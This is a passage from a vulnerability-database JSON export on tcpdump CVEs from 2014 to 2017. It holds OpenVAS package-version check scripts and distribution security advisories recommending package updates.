LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.2.1-1ubuntu2.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:31:43", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120040", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120040", "title": "Amazon Linux Local Check: ALAS-2015-557", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-557.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120040\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:15:56 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2015-557\");\n script_tag(name:\"insight\", value:\"Integer signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value. (CVE-2015-0261 )The osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value. (CVE-2015-2154 )\");\n script_tag(name:\"solution\", value:\"Run yum update tcpdump to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-557.html\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.0.0~3.20090921gitdf3cb4.2.10.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"tcpdump-debuginfo\", rpm:\"tcpdump-debuginfo~4.0.0~3.20090921gitdf3cb4.2.10.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:29", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869148", "title": "Fedora Update for tcpdump FEDORA-2015-4939", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4939\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869148\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:30 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\",\n \"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4939\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for\nmonitoring network traffic. Tcpdump can capture and display the packet headers\non a particular network interface or on all interfaces. Tcpdump can display all\nof the packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4939\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153834.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.7.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:48", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-04-19T00:00:00", "id": "OPENVAS:1361412562310869254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869254", "title": "Fedora Update for tcpdump FEDORA-2015-4953", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4953\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869254\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-19 06:54:36 +0200 (Sun, 19 Apr 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\",\n \"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4953\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4953\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/154808.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.5.1~4.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-23T15:07:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-08-04T00:00:00", "id": "OPENVAS:1361412562310871861", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871861", "title": "RedHat Update for tcpdump RHSA-2017:1871-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_1871-01_tcpdump.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for tcpdump RHSA-2017:1871-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871861\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-04 12:47:08 +0530 (Fri, 04 Aug 2017)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2153\", \"CVE-2015-2154\", \"CVE-2015-2155\",\n \"CVE-2016-7922\", \"CVE-2016-7923\", \"CVE-2016-7924\", \"CVE-2016-7925\",\n \"CVE-2016-7926\", \"CVE-2016-7931\", \"CVE-2016-7936\", \"CVE-2016-7973\",\n \"CVE-2016-7927\", \"CVE-2016-7928\", \"CVE-2016-7929\", \"CVE-2016-7930\",\n \"CVE-2016-7932\", \"CVE-2016-7933\", \"CVE-2016-7934\", \"CVE-2016-7935\",\n \"CVE-2016-7937\", \"CVE-2016-7938\", \"CVE-2016-7939\", \"CVE-2016-7940\",\n \"CVE-2016-7974\", \"CVE-2016-7975\", \"CVE-2016-7983\", \"CVE-2016-7984\",\n \"CVE-2016-7985\", \"CVE-2016-8575\", \"CVE-2017-5341\", \"CVE-2017-5485\",\n \"CVE-2016-7986\", \"CVE-2016-7992\", \"CVE-2016-7993\", \"CVE-2016-8574\",\n \"CVE-2017-5202\", \"CVE-2017-5203\", \"CVE-2017-5204\", \"CVE-2017-5205\",\n \"CVE-2017-5342\", \"CVE-2017-5482\", \"CVE-2017-5483\", \"CVE-2017-5484\",\n \"CVE-2017-5486\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for tcpdump RHSA-2017:1871-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tcpdump'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The tcpdump packages contain the tcpdump\n utility for monitoring network traffic. The tcpdump utility can capture and\n display the packet headers on a particular network interface or on all\n interfaces. The following packages have been upgraded to a later upstream\n version: tcpdump (4.9.0). (BZ#1422473) Security Fix(es): * Multiple out of\n bounds read and integer overflow vulnerabilities were found in tcpdump affecting\n the decoding of various protocols. An attacker could create a crafted pcap file\n or send specially crafted packets to the network segment where tcpdump is\n running in live capture mode (without -w) which could cause it to display\n incorrect data, crash or enter an infinite loop. (CVE-2015-0261, CVE-2015-2153,\n CVE-2015-2154, CVE-2015-2155, CVE-2016-7922, CVE-2016-7923, CVE-2016-7924,\n CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929,\n CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934,\n CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939,\n CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983,\n CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993,\n CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204,\n CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483,\n CVE-2017-5484, CVE-2017-5485, CVE-2017-5486) Red Hat would like to thank the\n Tcpdump project for reporting CVE-2016-7922, CVE-2016-7923, CVE-2016-7924,\n CVE-2016-7925, CVE-2016-7926, CVE-2016-7927, CVE-2016-7928, CVE-2016-7929,\n CVE-2016-7930, CVE-2016-7931, CVE-2016-7932, CVE-2016-7933, CVE-2016-7934,\n CVE-2016-7935, CVE-2016-7936, CVE-2016-7937, CVE-2016-7938, CVE-2016-7939,\n CVE-2016-7940, CVE-2016-7973, CVE-2016-7974, CVE-2016-7975, CVE-2016-7983,\n CVE-2016-7984, CVE-2016-7985, CVE-2016-7986, CVE-2016-7992, CVE-2016-7993,\n CVE-2016-8574, CVE-2016-8575, CVE-2017-5202, CVE-2017-5203, CVE-2017-5204,\n CVE-2017-5205, CVE-2017-5341, CVE-2017-5342, CVE-2017-5482, CVE-2017-5483,\n CVE-2017-5484, CVE-2017-5485, and CVE-2017-5486. Additional Changes: For\n detailed information on changes in this release, see the Red Hat Enterprise\n Linux 7.4 Release Notes linked from the References section.\");\n script_tag(name:\"affected\", value:\"tcpdump on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1871-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00005.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.9.0~5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcpdump-debuginfo\", rpm:\"tcpdump-debuginfo~4.9.0~5.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:05", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3193-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMarch 17, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : tcpdump\nCVE ID : CVE-2015-0261 CVE-2015-2153 CVE-2015-2154 CVE-2015-2155\n\nSeveral vulnerabilities have been discovered in tcpdump, a command-line\nnetwork traffic analyzer. These vulnerabilities might result in denial\nof service (application crash) or, potentially, execution of arbitrary\ncode.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 4.3.0-1+deb7u2.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-4.\n\nWe recommend that you upgrade your tcpdump packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-03-17T14:49:10", "published": "2015-03-17T14:49:10", "id": "DEBIAN:DSA-3193-1:51CD5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00078.html", "title": "[SECURITY] [DSA 3193-1] tcpdump security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:56", "bulletinFamily": "unix", "description": "Package : tcpdump\nVersion : tcpdump_4.1.1-1+deb6u2\nCVE ID : CVE-2015-0261 CVE-2015-2154 CVE-2015-2155\n\nSeveral issues have been discovered with tcpdump in the way it\nhandled some printer protocols. Those issues can lead to denial\nof service, or, potentially, execution of arbitrary code.\n\nCVE-2015-0261\n\n Missing bounds checks in IPv6 Mobility printer\n\nCVE-2015-2154\n\n Missing bounds checks in ISOCLNS printer\n\nCVE-2015-2155\n\n Missing bounds checks in ForCES printer\n\n\nThanks to Romain Fran\u00e7oise who prepared this update.\n-- \nRapha\u00ebl Hertzog \u25c8 Debian Developer\n\nSupport Debian LTS: http://www.freexian.com/services/debian-lts.html\nLearn to master Debian: http://debian-handbook.info/get/\n", "modified": "2015-03-17T09:57:59", "published": "2015-03-17T09:57:59", "id": "DEBIAN:DLA-174-1:F5DF3", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201503/msg00011.html", "title": "[SECURITY] [DLA 174-1] tcpdump security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "kaspersky": [{"lastseen": "2019-02-13T16:35:13", "bulletinFamily": "info", "description": "### *Detect date*:\n03/24/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in tcpdump. Malicious users can exploit these vulnerabilities to cause denial of service.\n\n### *Affected products*:\ntcpdump versions earlier than 4.7.2\n\n### *Solution*:\nUpdate to latest version! \n[Get tcpdump](<http://www.tcpdump.org/#latest-release>)\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[tcpdump](<https://threats.kaspersky.com/en/product/tcpdump/>)\n\n### *CVE-IDS*:\n[CVE-2015-0261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0261>) \n[CVE-2015-2155](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2155>) \n[CVE-2015-2154](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2154>) \n[CVE-2015-2153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2153>)", "modified": "2019-02-06T00:00:00", "published": "2015-03-24T00:00:00", "id": "KLA10498", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10498", "title": "\r KLA10498Denial of service vulnerabilities in tcpdump ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "description": "\r\n\r\n\r\nHi, please find tcpdump 4.7.2 source code at:\r\n http://www.ca.tcpdump.org/beta/tcpdump-4.7.2.tar.gz\r\n http://www.ca.tcpdump.org/beta/tcpdump-4.7.2.tar.gz.sig\r\n (there is also a matching libpcap)\r\n\r\nTo validate the source code with the "make check" you need to have\r\nlibpcap-4.7.2 or the geneve test cases will not function.\r\nThe signature files are made by mcr@sandelman.ca, and will get replaced\r\nwith tcpdump ones once I get physical access to the key later today.\r\n\r\nThis fixes CVE-2014-9140 --- issue with PPP printer (previously notified)\r\n CVE-2015-0261 --- issues with IPv6 mobility printer.\r\n CVE-2015-2153 --- issue with tcp printer.\r\n CVE-2015-2154 --- issue with ethernet printer.\r\n CVE-2015-2155 --- issue with force printer.\r\n\r\nThere are also other issues which related to Capsicum that were\r\nalready public, as well as DECNET fixes that came in.\r\nOur tcpdump 4.7.0 process failed (flailed?) over CVE-2014-9140,\r\nand was never properly released. 4.7.1 was internally marked, but not\r\nreleased.\r\n\r\nA patch for tcpdump 4.3 is at:\r\n http://www.ca.tcpdump.org/cve/\r\n\r\n0001-in-some-cases-we-expect-tcpdump-to-fail-with-an-erro.patch\r\n0002-test-case-files-for-CVE-2015-2153-2154-2155.patch\r\n0003-test-case-for-cve2015-0261-corrupted-IPv6-mobility-h.patch\r\n\r\nIf you require patches for other versions, please let us know.\r\n\r\nPatch 0001 is needed only so that "make check" will function.\r\n(tcpdump 4.3 may not detect libssl properly since ssl churn, so the ESP/IKE\r\ntest cases will fail since libssl was not detected)\r\n\r\nPlease ACK this email, and let me know when I can let this source code out.\r\n\r\n-- ] Never tell me the odds! | ipv6 mesh networks [ ] Michael Richardson, Sandelman Software Works | network architect [ ] mcr@sandelman.ca http://www.sandelman.ca/ | ruby on rails [\r\n\r\n", "modified": "2015-03-16T00:00:00", "published": "2015-03-16T00:00:00", "id": "SECURITYVULNS:DOC:31791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31791", "title": "tcpdump 4.7.2 remote crashes", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "description": "Multiple vulnerabilities in protocols dissectors.", "modified": "2015-03-16T00:00:00", "published": "2015-03-16T00:00:00", "id": "SECURITYVULNS:VULN:14315", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14315", "title": "tcpdump multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:34", "bulletinFamily": "unix", "description": "It was discovered that tcpdump incorrectly handled printing certain packets. A remote attacker could use this issue to cause tcpdump to crash, resulting in a denial of service, or possibly execute arbitrary code.\n\nIn the default installation, attackers would be isolated by the tcpdump AppArmor profile.", "modified": "2015-04-27T00:00:00", "published": "2015-04-27T00:00:00", "id": "USN-2580-1", "href": "https://usn.ubuntu.com/2580-1/", "title": "tcpdump vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:14", "bulletinFamily": "unix", "description": "### Background\n\ntcpdump is a Tool for network monitoring and data acquisition.\n\n### Description\n\nMultiple vulnerabilities have been discovered in tcpdump. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll tcpdump users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/tcpdump-4.7.4\"", "modified": "2015-10-31T00:00:00", "published": "2015-10-31T00:00:00", "id": "GLSA-201510-04", "href": "https://security.gentoo.org/glsa/201510-04", "type": "gentoo", "title": "tcpdump: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2018-10-02T16:55:22", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nInteger signedness error in the mobility_opt_print function in the IPv6 mobility printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) or possibly execute arbitrary code via a negative length value. ([CVE-2015-0261 __](<https://access.redhat.com/security/cve/CVE-2015-0261>))\n\nThe osi_print_cksum function in print-isoclns.c in the ethernet printer in tcpdump before 4.7.2 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted (1) length, (2) offset, or (3) base pointer checksum value. ([CVE-2015-2154 __](<https://access.redhat.com/security/cve/CVE-2015-2154>))\n\n \n**Affected Packages:** \n\n\ntcpdump\n\n \n**Issue Correction:** \nRun _yum update tcpdump_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686 \n tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.i686 \n \n src: \n tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.src \n \n x86_64: \n tcpdump-debuginfo-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64 \n tcpdump-4.0.0-3.20090921gitdf3cb4.2.10.amzn1.x86_64 \n \n \n", "modified": "2015-07-07T22:25:00", "published": "2015-07-07T22:25:00", "id": "ALAS-2015-557", "href": "https://alas.aws.amazon.com/ALAS-2015-557.html", "title": "Medium: tcpdump", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:38", "bulletinFamily": "unix", "description": "- CVE-2014-8767 (denial of service)\n\nInteger underflow in the olsr_print function when in verbose mode,\nallows remote attackers to cause a denial of service (crash) via a\ncrafted length value in an OLSR frame.\n\n- CVE-2014-8768 (denial of service)\n\nMultiple Integer underflows in the geonet_print function, when in\nverbose mode, allow remote attackers to cause a denial of service\n(segmentation fault and crash) via a crafted length value in a Geonet frame.\n\n- CVE-2014-8769 (out-of-bounds memory read)\n\nMight allow remote attackers to obtain sensitive information from memory\nor cause a denial of service (packet loss or segmentation fault) via a\ncrafted Ad hoc On-Demand Distance Vector (AODV) packet, which triggers\nan out-of-bounds memory access.\n\n- CVE-2014-9140 (denial of service)\n\nBuffer overflow in the ppp_hdlc function in 